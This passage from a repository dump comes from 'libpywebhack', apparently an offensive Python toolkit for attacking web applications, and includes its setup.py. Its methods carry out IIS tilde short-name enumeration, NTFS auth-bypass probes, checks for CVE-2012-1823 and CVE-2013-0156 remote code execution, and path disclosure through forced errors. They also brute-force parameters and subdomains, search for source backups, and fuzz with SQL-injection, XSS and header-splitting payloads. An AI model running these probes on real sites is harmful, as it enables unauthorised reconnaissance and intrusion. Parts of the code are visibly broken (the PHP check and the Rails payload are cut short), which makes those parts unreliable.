                tmp_headers['Accept'] = 'justfortest/justfortest'
                tmp_headers['Accept-Encoding'] = 'justfortest'
                tmp_headers['Accept-Language'] = 'justfortest'
                self.rep_log('Revealed names: %s' % self.makereq(path, headers=tmp_headers)[2]['alternates'])
        except (KeyError, TypeError, ValueError):
            pass
        self.rep_log('Trying to get real application name via invalid request...')
        tmp_headers = self.add_headers.copy()
        tmp_headers['Content-Length'] = 'x'
        html, code, _ = self.makereq(path, '', tmp_headers, 'POST')
        try:
            if code == 413:
                # Apache's 413 page reads "The requested resource<br />URI<br />"
                self.rep_log('Found real path: %s' % re.search('resource<br />(.*)<br />', html).group(1))
            else:
                self.rep_log('Failed')
        except:
            self.rep_log('Failed')
        self.chkpath(['server-status', 'balancer-manager'])

    def nginxtest(self, path):
        """
        Hack NginX
        :param path: target path
        """
        self.restructure(path)
        self.rep_log('==========\nTesting specific NginX issues')

    def iistest(self, path):
        """
        Search for sensitive IIS files, perform IIS files scanning, test access restriction bypass, test ASP.NET issues
        :param path: target path
        """
        self.restructure(path)
        self.rep_log('==========\nTesting for specific Microsoft-IIS issues')
        self.chkpath(['WEB-INF', 'META-INF', '_vti_bin'])
        self.rep_log('Testing for IIS+PHP/ASP auth bypass through NTFS')
        if self.makereq(path + '::$INDEX_ALLOCATION')[1] != 404:
            self.rep_log('Possibly vulnerable or blocked. Check at %s' % path + '::$INDEX_ALLOCATION')
        if self.makereq(path + ':$i30:$INDEX_ALLOCATION')[1] != 404:
            self.rep_log('Possibly vulnerable or blocked. 
Check at %s' % path + ':$i30:$INDEX_ALLOCATION') 129 | self.iiscan(path) 130 | self.asptest(path) 131 | 132 | def iiscan(self, path): 133 | """ 134 | Tilde (~) and wildcard (*) file names brute force in IIS 135 | :param path: target path 136 | """ 137 | self.restructure(path) 138 | self.rep_log('==========\nTrying to retrieve content of the current IIS directory') 139 | alph = 'abcdefghijklmnopqrstuvwxyz0123456789_-' 140 | if self.makereq(path + '*~1*/.aspx')[1] == 404: 141 | tail = '/.aspx' 142 | self.rep_log('IIS 6 possibly detected') 143 | elif self.makereq(path + '*~1*')[1] == 404: 144 | tail = '' 145 | self.rep_log('IIS 5.x possibly detected') 146 | elif self.makereq(path + '*~1*/')[1] == 404: 147 | tail = '/' 148 | self.rep_log('IIS 7.x, .NET 2 possibly detected (no error handling)') 149 | else: 150 | self.rep_log('No files in current directory, or technique does not work') 151 | return 152 | names, i = [''], 0 153 | while True: 154 | is_valid = True 155 | if i >= len(names): 156 | break 157 | while is_valid: 158 | payload, name, is_valid, is_first = '%s%s%s*~1*%s', names[i], False, True 159 | for c in alph: 160 | if self.makereq(payload % (path, name, c, tail))[1] == 404: 161 | is_valid = True 162 | if is_first: 163 | is_first = False 164 | names[i] += c 165 | self.rep_log('(Part of some file or directory name: %s%s)' % (path, names[i])) 166 | else: 167 | names.append(name + c) 168 | if not is_valid: 169 | names[i] += '~1' 170 | if self.makereq('%s%s*%s' % (path, names[i], tail))[1] != 404: 171 | self.rep_log('(Some short name prefix: %s. 
Now determining an extension)' % name) 172 | payload = '%s%s%s*%s' 173 | is_valid = True 174 | i += 1 175 | self.rep_log('==========\nFound short names in %s:\n%s' % (path, '\n'.join(names))) 176 | 177 | def phptest(self, path): 178 | """ 179 | Check for RCE, try to get PHP script path disclosure 180 | :param path: target path 181 | """ 182 | self.restructure(path) 183 | self.rep_log('==========\nTesting specific PHP issues\nTesting for CVE-2012-1823...') 184 | html, code, hdrs = self.makereq(path + '?-s+%3d') 185 | if ( html.startswith('(.*) on line', html) 216 | if spath != None: 217 | self.rep_log('Found server application path: %s' % spath.group(1)) 218 | else: 219 | self.rep_log( 220 | 'Failed\nTrying to get a max_execution_time error by sending a file with long name...\n' + 221 | 'It can take time, wait...') 222 | tmp_headers = self.add_headers.copy() 223 | tmp_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------31133713371337' 224 | file = '---------------------------31133713371337\r\n' \ 225 | 'Content-Disposition: form-data; name=file31337; filename=\r\njustfortest%s.txt\r\n' \ 226 | 'Content-Type: text/plain\r\n\r\njustfortest\r\n---------------------------31133713371337\r\n' 227 | file = file % '0' * 100500 228 | tmp_headers['Content-Length'] = len(file) 229 | html, code, hdrs = self.makereq(path, file, tmp_headers, 'POST') 230 | spath = re.search('in (.*) on line', html) 231 | if spath != None: 232 | self.rep_log('Found server application path: %s' % spath.group(1)) 233 | else: 234 | self.rep_log('Failed') 235 | if self.known_urls[path]['args'] == []: 236 | self.rep_log('I need to know script parameters in order to provoke the next PHP errors.') 237 | return 238 | self.rep_log( 239 | 'Trying to get a type error or a max_execution_time error by exceeding memory_limit...\n' + 240 | 'Considering max_input_nesting_level = 64...\nIt can take time, wait...') 241 | query = '=1&'.join([x + '[]' * 64 for x in 242 | 
self.known_urls[path]['args']['get'] + self.known_urls[path]['args']['post'] + 243 | self.known_urls[path]['args']['cookie']]) + '=1&' 244 | tmp_headers = self.add_headers.copy() 245 | tmp_headers['Cookie'] = query.replace('&', ';') 246 | tmp_headers.update({'Content-Type': 'application/x-www-form-urlencoded'}) 247 | html, code, hdrs = self.makereq('%s?%s' % (path, query), query, tmp_headers, 'POST') 248 | path = re.search('in (.*) on line', html) 249 | if path != None: 250 | self.rep_log('Found server application path: %s' % path.group(1)) 251 | else: 252 | self.rep_log('Failed') 253 | 254 | def asptest(self, path): 255 | """ 256 | Search for some sensitive .NET-specific files 257 | :param path: target path 258 | """ 259 | self.restructure(path) 260 | self.rep_log('==========\nTesting specific ASP.NET issues') 261 | try: 262 | self.rep_log('ASP.NET version: %s' % self.known_urls[path]['hdrs']['x-aspnet-version']) 263 | except: 264 | pass 265 | self.chkpath(['Trace.axd', 'elmah.axd', 'ScriptResource.axd?d=A', 'WebResource.axd?d=A']) 266 | 267 | def javatest(self, path): 268 | """ 269 | Hack Java 270 | :param path: target path 271 | """ 272 | self.restructure(path) 273 | self.rep_log('==========\nTesting specific Java issues') 274 | 275 | def rubytest(self, path): 276 | """ 277 | Retrieve information from HTTP headers, check for RoR object deserialization RCE 278 | :param path: target path 279 | """ 280 | self.restructure(path) 281 | self.rep_log('==========\nTesting Ruby on Rails framework and/or Rack web-server issues') 282 | try: 283 | self.rep_log( 284 | 'RoR project name: %s' % re.search('_(.*)_sess', 285 | self.known_urls[path]['hdrs'].get('set-cookie', '').group(1)) 286 | ) 287 | except: 288 | pass 289 | self.rep_log('==========\nTesting for CVE-2013-0156...') 290 | tmp_headers = self.add_headers.copy() 291 | tmp_headers['Content-Type'] = 'application/xml' 292 | pload = '\n' 293 | _, code1, _ = self.makereq(path, pload % ('string', 'hello'), tmp_headers, 
'POST') 294 | _, code2, _ = self.makereq(path, pload % ('yaml', '--- !ruby/object:Time {}\n'), tmp_headers, 'POST') 295 | _, code3, _ = self.makereq(path, pload % ('yaml', '--- !ruby/object:\x00'), tmp_headers, 'POST') 296 | if code2 == code1 and code3 != code2 and code3 != 200: 297 | self.rep_log('Possibly vulnerable to RCE') 298 | 299 | def pytest(self, path): 300 | """ 301 | Hack Django 302 | :param path: target path 303 | """ 304 | self.restructure(path) 305 | self.rep_log('==========\nTesting specific Python with Django framework issues') 306 | 307 | def gpcreq(self, path, query='', mode='get'): 308 | #mode = 'head' if self.cut == '' else 'get' if mode == None else mode 309 | """ 310 | self.restructure(path) 311 | Send data via GET, POST request or in Cookie-header 312 | :param path: target path 313 | :param query: URL-encoded QUERY_STRING 314 | :param mode: 'get', 'post' or 'cookie' 315 | :return: 316 | """ 317 | method = mode.upper() 318 | if mode == 'post': 319 | tmp_headers = self.add_headers.copy() 320 | tmp_headers['Content-Type'] = 'application/x-www-form-urlencoded' 321 | resp = self.makereq(path, query, tmp_headers, 'POST') 322 | elif mode == 'cookie': 323 | tmp_headers = self.add_headers.copy() 324 | tmp_headers['Cookie'] = query.replace('&', ';') 325 | resp = self.makereq(path, headers=tmp_headers) 326 | else: 327 | resp = self.makereq(path + ('?' if '?' not in path else '&') + query, method=method) 328 | return resp 329 | 330 | def argsfind(self, path, modes=['get'], fill='1', base='bases/argsbase.txt', fix=[]): 331 | """ 332 | Search for the input parameters of the web-scenario 333 | :param path: target path 334 | :param modes: list of the data transition methods ('get', 'post' or 'cookie') 335 | :param fill: the payload which should be plugged into parameters 336 | :param base: path to file with parameter names 337 | :param fix: fixed points, i.e. 
a list of parameters which should be sent in each request 338 | """ 339 | self.restructure(path) 340 | base = [x.strip() for x in open(base)] 341 | 342 | def args_dichotomy(base): 343 | self.rep_log('.', delim='') 344 | params = dict([(x, fill ) for x in base]) 345 | query = urlencode(params) 346 | l = len(base) 347 | html, code, hdrs = self.gpcreq(path, query, mode) 348 | if html is None: 349 | pass 350 | if code == 414 or (code == 400 and mode == 'cookie'): 351 | self.rep_log('Too big base, splitting...') 352 | args_dichotomy(fix + base[:int(l / 2)]) 353 | args_dichotomy(fix + base[int(l / 2):l]) 354 | return 355 | if hdrs.get('Content-Length', len(html)) != len(self.known_urls[path]['html']) \ 356 | or code != self.known_urls[path]['code']: 357 | self.rep_log('*', delim='') 358 | if l == 1: 359 | self.known_urls[path]['args'][mode] += params 360 | else: 361 | args_dichotomy(fix + base[:int(l / 2)]) 362 | args_dichotomy(fix + base[int(l / 2):l]) 363 | 364 | self.rep_log( 365 | '==========\nSearching for the %s-parameters of %s\n%s' % (modes, path, len(base)) + 366 | ' items loaded from the base' 367 | ) 368 | 369 | for mode in modes: 370 | self.rep_log('Detecting the default page length and HTTP-code...') 371 | self.known_urls[path]['html'], self.known_urls[path]['code'], self.known_urls[path]['hdrs'] = self.gpcreq( 372 | path, urlencode(dict([(x, fill ) for x in fix])), mode) 373 | self.rep_log('==========\nStarting dichotomy for %s-params...\n==========' % mode.upper()) 374 | #max_input_vars in PHP is 1001 375 | for x in [base[1001 * i: 1001 * (i + 1)] for i in xrange((len(base) + 1000 ) / 1001)]: 376 | args_dichotomy(fix + x) 377 | self.rep_log('\n==========\nFound parameters: %s' % ','.join(set(self.known_urls[path]['args'][mode]))) 378 | 379 | def fuzzbackups(self, path): 380 | """ 381 | Search for source code backups of the script 382 | :param path: target path 383 | """ 384 | self.restructure(path) 385 | self.rep_log('==========\nSearching for the back-ups 
of %s' % path) 386 | pieces = path.split('/') 387 | path = '/'.join(pieces[:-1])[1:] + '/' 388 | filename = pieces[-1] 389 | parts = filename.split('.') 390 | self.chkpath( 391 | ['%s%s.bak' % (path, '.'.join(parts[:-1]) if len(parts) > 2 else parts[0]), '%s%s.bak' % (path, filename), 392 | '%s%s.old' % (path, filename)], 'generic backups') 393 | self.chkpath(['%s%s.swp' % (path, filename), '%s%s.swo' % (path, filename), '%s.%s.swp' % (path, filename)], 394 | 'Vim swap files') 395 | self.chkpath(['%s%s~' % (path, filename)], 'Vim, Gedit temporary file') 396 | self.chkpath(['%sCopy%%20of%%20%s' % (path, filename), '%s%s%%20copy%s' % ( 397 | path, '.'.join(parts[:-1]) if len(parts) > 2 else parts[0], '.' + parts[-1] if len(parts) > 1 else '')], 398 | 'Windows or MacOS copies of the file') 399 | self.chkpath(['%s%%23%s%%23' % (path, filename)], 'Emacs temporary file') 400 | self.chkpath(['%s%s.save' % (path, filename), '%s%s.save.1' % (path, filename)], 'GNU Nano temporary files') 401 | self.chkpath(['%s.%%23%s' % (path, filename)], 'MCEdit temporary files') 402 | self.chkpath(['%s.%s.un~' % (path, filename)], 'Deleted files') 403 | self.chkpath(['%s%ss' % (path, filename)], '(PHP) source code') 404 | 405 | def brutesubs(self, threads=5, words='bases/wordlist2.txt', ban_codes=None, ban_regex=None): 406 | """ 407 | Multi-threaded brute force of existing subdomains of the given domain 408 | :param threads: number of threads 409 | :param words: path to file with subdomain names 410 | :param ban_codes: ignore subdomains which respond with these codes via HTTP 411 | :param ban_regex: ignore subdomains which respond with body matching this regular expression via HTTP 412 | """ 413 | self.rep_log('==========\nSearching for the subdomains of %s' % self.host) 414 | wordlist, threads_num = open(words), int(threads) 415 | try: 416 | self.ban_codes = ban_codes.split(',') 417 | except: 418 | self.ban_codes = [] 419 | self.ban_regex = ban_regex 420 | self.subs = [x.strip() for x in 
wordlist] 421 | words_num = len(self.subs) 422 | 423 | self.rep_log('%s names loaded. Starting %s threads' % (words_num, threads_num)) 424 | threads, i, self.checked_subs = [], 0, 0 425 | 426 | blocks = words_num // threads_num 427 | while i < threads_num: 428 | a = i * blocks 429 | b = words_num if i == threads_num - 1 else a + blocks 430 | i += 1 431 | threads.append(threading.Thread(target=self.dobrute, args=(a, b))) 432 | i = 0 433 | 434 | while i < threads_num: 435 | threads[i].start() 436 | i += 1 437 | 438 | def dobrute(self, a, b): 439 | """ 440 | A worker-method for WebHack.brutesubs() 441 | :param a: beginning of interval 442 | :param b: end of interval 443 | """ 444 | for sub in self.subs[a: b]: 445 | if self.checked_subs % 1000 == 0 and self.checked_subs != 0: 446 | self.rep_log('%s names proceeded' % self.checked_subs) 447 | try: 448 | conn = httplib.HTTPConnection('%s.%s' % (sub, self.host), timeout=5) 449 | if self.ban_regex != '': 450 | conn.request('GET', '/') 451 | else: 452 | conn.request('HEAD', '/') 453 | res = conn.getresponse() 454 | self.cnt_reqs += 1 455 | if (str(res.status) not in self.ban_codes) and not ( 456 | self.ban_regex != None and re.search(self.ban_regex, res.read())): 457 | domain = '%s.%s' % (sub, self.host) 458 | self.known_subs.append(domain) 459 | self.rep_log('Found: %s' % domain) 460 | conn.close() 461 | except (socket.gaierror, socket.herror): 462 | pass 463 | except (socket.timeout, socket.error): 464 | self.rep_log('Found: %s.%s' % (sub, self.host)) 465 | self.checked_subs += 1 466 | 467 | def domxsstest(self, path): 468 | """ 469 | Test if javascript-file matches some regular expressions, possibly indicating DOM XSS 470 | :param path: target path 471 | """ 472 | self.restructure(path) 473 | self.rep_log('==========\nSearching for DOM-based XSS vulnerabilities in %s' % path) 474 | if self.known_urls[path]['html'] is None: 475 | self.known_urls[path]['html'], self.known_urls[path]['code'], self.known_urls[path]['hdrs'] = 
self.makereq( 476 | path) 477 | txt = self.known_urls[path]['html'].split('\n') 478 | for line, text in enumerate(txt): #tnx .mario for regexps 479 | re1 = '(((src|href|data|location|code|value|action)\s*["\'\]]*\s*\+?\s*=)|((replace|assign|navigate|' \ 480 | 'getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|' \ 481 | 'setTimeout|setInterval)\s*["\'\]]*\s*\())' 482 | re2 = '((location\s*[\[.])|([.\[]\s*["\']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|' \ 483 | 'open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|' \ 484 | 'parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database))' 485 | if re.search(re1, text): 486 | info = 'DOM-based XSS. Line %s: %s' % (line, re.sub(re1, '\033[31;1m\\1\033[30;0m', text)) 487 | self.rep_log(info) 488 | if re.search(re2, text): 489 | info = 'DOM-based XSS. Line %s: %s' % (line, re.sub(re2, '\033[31;1m\\1\033[30;0m', text)) 490 | self.rep_log(info) 491 | 492 | def minifuzz(self, path): 493 | """ 494 | Rapid fuzzing of known parameters 495 | :param path: target path 496 | """ 497 | self.restructure(path) 498 | fuzz_base = { 499 | '\'"koh\\ \r\ntest:tset;&\0': [ 500 | {#patterns for response body 501 | 'SQL-injection': ['error.*sql', 'sql.*error'], 502 | 'PHP Error': ['warning.*php'], 503 | 'XSS': ['', '(\'[^k]*koh|[^"]*"koh)[^>]*>'], #second pattern is for xss in tag attribute 504 | }, 505 | {#patterns for response headers 506 | #'Internal Server Error' : [ '^HTTP/1.[01] 500' ], 507 | 'HTTP Response Splitting': ['\r\n?test'] 508 | } 509 | ] 510 | } 511 | 512 | for payload in fuzz_base: 513 | for mode in ['get', 'post', 'cookie']: 514 | if len(self.known_urls[path]['args'][mode]) > 0: 515 | self.rep_log('==========\nFuzzing %s-parameters' % mode.upper()) 516 | query = urlencode({x: payload for x in self.known_urls[path]['args'][mode]}) 517 | html, code, hdrs = self.gpcreq(path, query, mode) 518 | if code == 500: 519 | self.rep_log('Found 
Internal Server Error. Payload: %s' % query) 520 | for vuln in fuzz_base[payload][0]: #checking response body 521 | for pattern in fuzz_base[payload][0][vuln]: 522 | if re.search(pattern, html, re.I | re.S): 523 | self.rep_log('Found %s. Payload: %s' % (vuln, query)) 524 | for vuln in fuzz_base[payload][1]: #checking response headers 525 | for pattern in fuzz_base[payload][1][vuln]: 526 | if re.search(pattern, '\r\n'.join([' '.join((x, y)) for (x, y) in hdrs.items()]), 527 | re.I | re.S): 528 | self.rep_log('Found %s. Payload: %s' % (vuln, query)) 529 | 530 | if __name__ == '__main__': 531 | PyWebHack() 532 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from distutils.core import setup 2 | 3 | setup( 4 | name='libpywebhack', 5 | version='1.0', 6 | packages=[''], 7 | url='http://ahack.ru/releases/python-web-hacking.htm', 8 | license='Creative Commons Attribution Non-Commercial Share Alike', 9 | author='Beched', 10 | author_email='admin@ahack.ru', 11 | description='A web application analysis toolkit' 12 | ) 13 | --------------------------------------------------------------------------------